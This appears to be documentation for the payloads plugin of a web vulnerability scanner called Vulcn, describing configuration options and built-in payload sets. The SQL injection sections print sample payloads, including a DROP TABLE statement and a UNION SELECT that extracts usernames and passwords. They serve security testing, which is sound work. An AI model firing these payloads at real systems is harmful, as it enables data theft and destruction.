Overview
The payloads plugin handles all payload loading for Vulcn:
- Built-in payloads - 13 payload sets, 91 individual payloads
- PayloadsAllTheThings - Fetch from the popular repository
- Custom files - Load your own YAML/JSON payload files
Installation
The plugin is included with the CLI and loaded automatically.
Configuration
Options
| Option | Type | Default | Description |
|---|---|---|---|
| builtin | boolean | true | Include built-in payloads |
| include | string[] | - | Only include these payload sets |
| exclude | string[] | - | Exclude these payload sets |
| payloadbox | string[] | - | Fetch from PayloadsAllTheThings |
| files | string[] | - | Custom payload file paths |
Built-in Payload Sets
XSS Payloads
xss-basic (15 payloads)
Basic XSS payloads with script tags and simple event handlers:
xss-event (12 payloads)
Event handler payloads:
xss-svg (8 payloads)
SVG-based XSS payloads:
xss-polyglot (5 payloads)
Polyglot payloads that work in multiple contexts:
SQL Injection Payloads
sqli-basic (10 payloads)
Basic SQL injection payloads:
```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1' OR '1'='1
1; DROP TABLE users--
...
```
sqli-error (8 payloads)
Error-based SQL injection:
```
' AND 1=CONVERT(int,@@version)--
' AND extractvalue(1,concat(0x7e,version()))--
...
```
sqli-blind (6 payloads)
Blind SQL injection (time-based):
```
' AND SLEEP(5)--
' AND 1=1 AND SLEEP(5)--
1' AND (SELECT SLEEP(5))--
...
```
sqli-union (5 payloads)
UNION-based SQL injection:
```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT username,password FROM users--
...
```
Other Payloads
| Set | Count | Description |
|---|---|---|
| ssrf-basic | 5 | Server-Side Request Forgery |
| xxe-basic | 4 | XML External Entity |
| cmd-basic | 6 | Command injection |
| path-traversal | 8 | Directory traversal |
| open-redirect | 4 | Open redirect |
PayloadsAllTheThings
Fetch payloads from PayloadsAllTheThings:

| Type | Description |
|---|---|
| xss | XSS payloads |
| sql-injection | SQL injection payloads |
| xxe | XXE payloads |
| command-injection | Command injection payloads |
| open-redirect | Open redirect payloads |
| path-traversal | Path traversal payloads |
